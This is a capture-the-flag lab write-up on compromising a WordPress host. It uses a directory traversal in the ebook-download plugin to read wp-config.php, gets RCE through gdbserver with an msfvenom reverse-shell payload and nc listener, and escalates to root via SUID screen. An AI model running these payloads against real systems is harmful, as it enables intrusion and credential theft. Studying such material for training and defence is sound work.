0x01 Introduction#
Target machine IP: 10.10.11.125.
Local machine IP: 10.10.16.21, mac m1.
0x02 Simple Information Gathering#
Only port 22 and 80 were discovered during fscan port scanning. After running nmap scan, another port 1337 was found, but it is uncertain what this port is used for.
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Visiting http://10.10.11.125/ leads to a WordPress website. The WordPress version is 5.8.1, and the login address for the WordPress backend is: http://backdoor.htb/wp-login.php.
The results from wpsan scanning did not provide any useful information.
Under the wp-content directory of WordPress, there is a plugins directory. Visiting http://10.10.11.125/wp-content/plugins/ reveals a php file and an eboo-download directory. Initially, hello.php was thought to be a malicious file, but after analysis, it was determined not to be a Trojan. Since ebook-download is located in the plugins directory and readme.txt is available, it is confirmed to be a plugin.
0x03 Exploiting Vulnerabilities#
Searching for exploits on https://www.exploit-db.com/, a directory traversal vulnerability was found.
The proof of concept (PoC) is as follows:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Download the wp-config file.
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
This file contains the username and password for the database. Attempting to log in to the WordPress backend was unsuccessful.
At this point, there are no further ideas. After looking at wp, it was discovered that the service on port 1337 can be exploited directly for remote code execution (RCE). The gdbserver service is running on port 1337. For penetration testing with gdbserver, refer to: https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver. The exploit script for gdbserver can be found at: https://www.exploit-db.com/exploits/50539.
Exploitation process:
- Download the exploit to the local machine.
- Generate shellcode using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
- Start local listener.
nc -lvp 1234
- Run the exploit.
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
Upgrade to an interactive shell.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color
Another method to detect the services running on the target server is to use the /proc/pid/cmdline file. In the proc directory, directories named with numbers represent currently running processes, with the directory name being the process's PID.
By using Burp Suite to iterate through the PID and enumerate the services running on the target server.
0x04 Privilege Escalation#
Search for files running with root user privileges and have the suid set. One such file is /usr/bin/screen.
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 Conclusion#
- Learned how to combine arbitrary file read vulnerabilities to detect services running on the target server, as well as knowledge about screen privilege escalation.
References:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174